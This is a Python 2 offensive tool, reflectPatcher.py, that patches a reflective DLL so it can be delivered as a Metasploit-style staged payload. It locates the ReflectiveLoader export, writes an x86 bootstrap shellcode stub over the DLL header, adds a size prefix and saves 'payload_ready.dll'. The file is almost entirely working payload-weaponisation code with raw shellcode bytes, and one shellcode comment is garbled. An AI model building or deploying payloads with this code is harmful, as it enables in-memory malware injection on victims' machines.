└── reflectPatcher.py


/reflectPatcher.py:
--------------------------------------------------------------------------------
  1 | import sys, pefile, struct
  2 | 
  3 | __author__  = "Borja Merino Febrero"
  4 | __email__   = "bmerinofe@gmail.com"
  5 | __license__ = "GPL"
  6 | __version__ = "0.1"
  7 | 
  8 | class bcolors:
  9 |     FAIL = '\033[91m'
 10 |     BOLD = '\033[1m'
 11 |     GREEN = '\033[32m'
 12 |     ENDC = '\033[0m'
 13 | 
 14 | def get_file_offset(pe):
 15 |   rva =''
 16 |   if hasattr(pe, 'DIRECTORY_ENTRY_EXPORT'):
 17 |     for export in pe.DIRECTORY_ENTRY_EXPORT.symbols:
 18 |       if "ReflectiveLoader" in export.name:
 19 |         rva = export.address
 20 |         print bcolors.GREEN + "[*] %s export Found! Ord:%s EntryPoint offset: %xh" % (export.name, export.ordinal, rva) + bcolors.ENDC
 21 |         break;
 22 | 
 23 |   if not rva:
 24 |     print bcolors.FAIL + "[!] Reflective export function not found :/" + bcolors.ENDC
 25 |     sys.exit(1)
 26 | 
 27 |   offset_va = rva - pe.get_section_by_rva(rva).VirtualAddress
 28 |   offset_file = offset_va + pe.get_section_by_rva(rva).PointerToRawData
 29 | 
 30 |   # Correct 7 bytes
 31 |   offset_file -= 7
 32 | 
 33 |   # Return little endian version
 34 |   return struct.pack("<I", offset_file).encode('hex')
 35 | 
 36 | def patch_stub(offset_file, exit_addr):
 37 |   stub = ("\x4D"                                    # dec ebp             ; M
 38 |           "\x5A"                                    # pop edx             ; Z
 39 |           "\xE8\x00\x00\x00\x00"                    # call 0              ; call nexmsn ls t instruction
 40 |           "\x5B"                                    # pop ebx             ; get our location (+7)
 41 |           "\x52"                                    # push edx            ; push edx back
 42 |           "\x45"                                    # inc ebp             ; restore ebp
 43 |           "\x55"                                    # push ebp            ; save ebp
 44 |           "\x89\xE5"                                # mov ebp, esp        ; setup fresh stack frame
 45 |           "\x81\xC3" + offset_file.decode('hex')  + # add ebx, 0x???????? ; add offset to ReflectiveLoader
 46 |           "\xFF\xD3"                                # call ebx            ; call ReflectiveLoader
 47 |           "\x89\xC3"                                # mov ebx, eax        ; save DllMain for second call
 48 |           "\x57"                                    # push edi            ; our socket
 49 |           "\x68\x04\x00\x00\x00"                    # push 0x4            ; signal we have attached
 50 |           "\x50"                                    # push eax            ; some value for hinstance
 51 |           "\xFF\xD0"                                # call eax            ; call DllMain( somevalue, DLL_METASPLOIT_ATTACH, socket )
 52 |           "\x68" + exit_addr +                      # push 0x????????     ; our EXITFUNC placeholder
 53 |           "\x68\x05\x00\x00\x00"                    # push 0x5            ; signal we have detached
 54 |           "\x50"                                    # push eax            ; some value for hinstance
 55 |           "\xFF\xD3")                               # call ebx            ; call DllMain( somevalue, DLL_METASPLOIT_DETACH, exitfunk )
 56 |   return stub
 57 | 
 58 | 
 59 | def main(argv):
 60 |   exit_method = {'thread': '\xE0\x1D\x2A\x0A', 'seh': '\xFE\x0E\x32\xEA', 'process':'\xF0\xB5\xA2\x56'}
 61 |   exit_addr = exit_method["thread"]
 62 | 
 63 |   if len(sys.argv) == 1:
 64 |     print bcolors.GREEN + "Usage: python reflectPatcher.py payload.dll [thread|seh|process]" + bcolors.ENDC
 65 |     sys.exit(1)
 66 | 
 67 |   if len(sys.argv) > 2:
 68 |     if sys.argv[2] not in exit_method:
 69 |       print bcolors.FAIL + "[!] Not valid exit method" + bcolors.ENDC
 70 |       sys.exit(1)
 71 |     else:
 72 |       exit_addr = exit_method[sys.argv[2]]
 73 | 
 74 |   dll = sys.argv[1]
 75 | 
 76 |   try:
 77 |     pe =  pefile.PE(dll)
 78 |     print bcolors.GREEN + "[*] %s loaded" % dll + bcolors.ENDC
 79 |   except IOError as e:
 80 |     print str(e)
 81 |     sys.exit(1)
 82 | 
 83 |   offset_file = get_file_offset(pe)
 84 |   stub = patch_stub(offset_file,exit_addr)
 85 | 
 86 |   src = file(dll,'rb')
 87 |   payload = src.read()
 88 | 
 89 |   # Relfective = Size payload + stub + (payload - stub)
 90 |   reflective_payload = struct.pack("<I",len(payload))  + stub + payload[len(stub):]
 91 |   print bcolors.GREEN + "[*] Size (4 bytes) prefixed at the beginning of the payload. Cut it off if you are using a HTTP stager!" + bcolors.ENDC
 92 | 
 93 |   patched_dll = 'payload_ready.dll'
 94 |   dst = open(patched_dll,'wb')
 95 |   dst.write(reflective_payload)
 96 | 
 97 |   src.close()
 98 |   dst.close()
 99 |   print bcolors.BOLD + "[+] Patched! %s (%d bytes)." % (patched_dll,len(reflective_payload)) + bcolors.ENDC
100 | 
101 | if __name__ == '__main__':
102 |   main(sys.argv[1:])
103 | 


--------------------------------------------------------------------------------